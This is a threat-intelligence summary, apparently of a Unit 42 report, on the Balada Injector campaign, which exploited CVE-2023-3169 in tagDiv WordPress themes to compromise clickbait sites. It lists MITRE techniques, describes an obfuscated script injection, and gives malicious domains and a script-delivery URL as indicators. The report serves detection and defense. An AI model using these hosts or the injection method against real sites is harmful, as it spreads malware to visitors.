Since August 2023, there has been a notable rise in compromised clickbait and ad sites that exploit outdated software to reach a large audience and drive ad revenue. The article explains how these sites operate, the CVE-2023-3169 campaign against WordPress themes, how to detect vulnerable sites, and the defensive protections available from Palo Alto Networks. #CVE-2023-3169 #BaladaInjector #tagDivNewspaper #tagDivNewsmag #WordPress #YoastSEO #MonsterInsights
Keypoints
- Rise in compromised clickbait/ad sites since late Aug 2023, driven by their potential reach and use of outdated software.
- Three traffic-boosting strategies: evergreen topics, content discovery platforms with native ads, and generative AI tooling.
- Exploitation of CVE-2023-3169 in tagDiv’s Newspaper/Newsmag WordPress themes (with Composer plugin) led to thousands of site compromises.
- Analysis found ~10,300 compromised WordPress sites over two months, with clickbait/ad sites accounting for a large share; ~80% used the Newspaper theme, ~6% used Newsmag.
- Injected scripts were obfuscated (decimal ASCII values) and referenced stay.decentralappps.com/src/page.js, linked to the Balada Injector campaign.
- Indicator-based discovery shows web stack patterns (WordPress, specific plugins) help identify vulnerable sites, enabling exploitation of known CVEs.
MITRE Techniques
- [T1190] Exploit Public-Facing Application – Used to exploit CVE-2023-3169 affecting tagDiv’s Newspaper and Newsmag themes with the WordPress Composer plugin. ‘On Sept. 11, 2023, MITRE published CVE-2023-3169 for a vulnerability affecting tagDiv’s Newspaper and Newsmag themes when used with its Composer plugin for WordPress.’
- [T1027] Obfuscated/Compressed Files and Information – The obfuscated script uses decimal values representing ASCII characters. ‘This obfuscated script uses decimal values representing ASCII characters. Converting these numbers to ASCII text reveals the malicious script…’
- [T1071.001] Web Protocols – The decoded script contains a URL to a remote host (stay.decentralappps.com/src/page.js) used to load additional content. ‘The decoded script in Figure 8 contains the same hxxps://stay[.]decentralappps[.]com/src/page.js URL noted in previous reports…’
- [T1518] Software Discovery – Threat actors use web stack data to determine if a server is running any out-of-date software or applications. ‘Threat actors use web stack data to determine if a server is running any out-of-date software or applications.’
Indicators of Compromise
- [Domain] Malicious domains – stay.decentralappps.com, gofindyou.com
- [URL] Injected/script delivery URL – http(s)://stay.decentralappps.com/src/page.js, http(s)://gofindyou.com/health/what-causes-plaque-psoriasis-heres-what-doctors-need-you-to-know
Read more: https://unit42.paloaltonetworks.com/dangers-of-clickbait-sites/